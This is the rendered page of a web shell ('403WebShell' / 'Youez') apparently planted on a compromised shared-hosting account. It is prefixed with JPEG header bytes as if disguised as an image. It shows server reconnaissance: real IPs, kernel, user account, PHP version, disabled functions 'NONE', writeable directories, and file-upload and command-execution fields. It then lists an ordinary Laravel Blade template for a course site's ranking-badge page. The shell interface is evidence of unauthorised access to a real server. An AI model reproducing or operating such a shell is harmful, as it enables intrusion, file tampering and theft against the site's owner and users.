����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 52.15.60.240
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirmacademy.com/resources/views/organization/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirmacademy.com/resources/views/organization/ranking-badge-list.blade.php
@extends('layouts.organization')

@section('breadcrumb')
    <div class="page-banner-content text-center">
        <h3 class="page-banner-heading text-white pb-15"> {{ __('Ranking Badge') }} </h3>

        <!-- Breadcrumb Start-->
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb justify-content-center">
                <li class="breadcrumb-item font-14"><a href="{{route('organization.dashboard')}}">{{__('Dashboard')}}</a></li>
                <li class="breadcrumb-item font-14 active" aria-current="page">{{ __('Ranking Badge') }}</li>
            </ol>
        </nav>
    </div>
@endsection

@section('content')
    <div class="instructor-profile-right-part">
        <div class="instructor-quiz-list-page instructor-ranking-badge-page">

            <div class="instructor-my-courses-title d-flex justify-content-between align-items-center">
                <h6>{{ __('Ranking Badge List') }}</h6>
                <a href="{{ route('organization.dashboard') }}" class="theme-btn theme-button1 default-back-btn default-hover-btn m-0">{{ __('Back') }}</a>
            </div>

            <div class="row ranking-badge-page-row">
                <div class="col-lg-12 col-xl-12 ranking-badge-page-side-box">
                    <div class="ranking-items-wrap">
                        @foreach(@$levels as $level)
                        <div class="ranking-item d-flex align-items-center justify-content-between">
                            <div class="d-flex align-items-center ranking-item-left">
                                <div class="flex-shrink-0 user-img-wrap">
                                    <img src="{{ getImageFile($level->image_path) }}" alt="img" class="img-fluid">
                                </div>
                                <div class="flex-grow-1 ranking-content-in-right">
                                    <h6 class="font-15">{{ $level->name }}</h6>
                                </div>
                            </div>
                            <div class="d-flex align-items-center ranking-item-right">
                                <div class="flex-shrink-0">
                                    <p class="font-15 color-heading text-center">{{ __('Earning') }}</p>
                                    <p class="font-15 color-heading text-center">
                                        @if(get_currency_placement() == 'after')
                                            {{ $level->earning }} {{ get_currency_symbol() }}
                                        @else
                                            {{ get_currency_symbol() }} {{ $level->earning }}
                                        @endif
                                    </p>
                                </div>
                                <div class="flex-shrink-0 ranking-content-in-right">
                                    <p class="font-15 color-heading text-center">{{ __('Student') }}</p>
                                    <p class="font-15 color-heading text-center">{{ $level->student }}</p>
                                </div>
                            </div>
                        </div>
                        @endforeach
                    </div>
                </div>
            </div>

        </div>
    </div>
@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit